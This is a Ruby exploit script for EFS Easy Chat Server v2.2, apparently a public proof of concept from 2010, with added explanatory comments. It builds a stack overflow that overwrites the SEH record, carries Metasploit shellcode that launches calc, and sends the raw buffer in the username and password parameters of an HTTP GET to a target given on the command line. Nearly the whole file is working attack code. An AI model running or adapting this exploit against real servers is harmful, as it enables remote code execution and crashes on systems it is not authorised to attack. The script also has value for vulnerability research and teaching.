1 #!/usr/bin/ruby
2 # Author: John Babio
3 # Tested on: [Windows XP Sp3 Eng]
4
require 'net/http'
require 'uri'
require 'socket'
8
9
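# --- SEH overwrite payload -------------------------------------------------
# Layout of the overflowing parameter value (offsets from its first byte):
#   [0, 216)    filler   'A' * 216 — reaches the SEH record on the stack
#   [216, 220)  nSEH     jmp +6 / nop / nop — hops over the handler pointer
#   [220, 224)  SEH      0x1001B9A2 little-endian — pop ebx / pop ebp / ret
#                        in SSLEAY32.dll (per the original author's note)
#   [224, 384)  shellcode, 160 bytes

# nSEH: `eb 06` is a short relative jump. Six bytes past its own end skips
# the two NOP bytes plus the 4-byte handler address and lands on the shellcode.
jmp = "\xeb\x06\x90\x90"

# SEH handler: pop ebx; pop ebp; ret in SSLEAY32.dll, i.e. address 0x1001B9A2
# written little-endian. The third byte was `\01` (octal) in the original;
# `\x01` is the identical byte in the same escape style as its neighbours.
# NOTE(review): this address is specific to the SSLEAY32.dll build shipped
# with the targeted Easy Chat Server install — confirm before use elsewhere.
ppr = "\xa2\xb9\x01\x10"

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Benign proof-of-concept payload (spawns calc). The encoder's decoder stub
# leads; the 160-byte size is what the `Size=160` tag above refers to.
shellcode = "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x86" +
"\x49\xae\x6a\x83\xeb\xfc\xe2\xf4\x7a\xa1\xea\x6a\x86\x49\x25\x2f" +
"\xba\xc2\xd2\x6f\xfe\x48\x41\xe1\xc9\x51\x25\x35\xa6\x48\x45\x23" +
"\x0d\x7d\x25\x6b\x68\x78\x6e\xf3\x2a\xcd\x6e\x1e\x81\x88\x64\x67" +
"\x87\x8b\x45\x9e\xbd\x1d\x8a\x6e\xf3\xac\x25\x35\xa2\x48\x45\x0c" +
"\x0d\x45\xe5\xe1\xd9\x55\xaf\x81\x0d\x55\x25\x6b\x6d\xc0\xf2\x4e" +
"\x82\x8a\x9f\xaa\xe2\xc2\xee\x5a\x03\x89\xd6\x66\x0d\x09\xa2\xe1" +
"\xf6\x55\x03\xe1\xee\x41\x45\x63\x0d\xc9\x1e\x6a\x86\x49\x25\x02" +
"\xba\x16\x9f\x9c\xe6\x1f\x27\x92\x05\x89\xd5\x3a\xee\xb9\x24\x6e" +
"\xd9\x21\x36\x94\x0c\x47\xf9\x95\x61\x2a\xcf\x06\xe5\x49\xae\x6a"

# Final overflow string: filler (0x41 bytes) + nSEH + SEH + shellcode = 384 bytes.
buffer = 'A' * 216 + jmp + ppr + shellcode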
27
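# --- Delivery ---------------------------------------------------------------
# Target host comes from the first command-line argument; the original
# hard-coded lab address stays as the default so existing invocations work.
target = ARGV[0] || '10.10.99.12'
url = URI.parse("http://#{target}")

# The payload travels in the GET query string, in both `username` and
# `password`, exactly as the original exploit sent it. It is intentionally
# NOT URL-encoded — the server must receive the raw bytes for the SEH
# overwrite to land. The shellcode contains bytes an HTTP stack may treat as
# delimiters or escapes (0x2b '+', 0x25 '%', 0x23 '#', 0x0d CR); the exploit
# relies on Easy Chat Server passing them through undecoded.
path = '/chat.ghp?username=' + buffer + '&password=' + buffer + '&room=1&sex=2'

begin
  res = Net::HTTP.start(url.host, url.port) { |http| http.get(path) }
  puts res.body
rescue EOFError, Errno::ECONNRESET => e
  # A successful overflow usually takes the chat server down before it answers,
  # so a dropped connection is an expected outcome, not a script failure.
  puts "connection dropped (#{e.class}) - target likely crashed or shellcode ran"
end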
Exploit EFS Software Easy Chat Server v2.2
John Babio
01/18/2010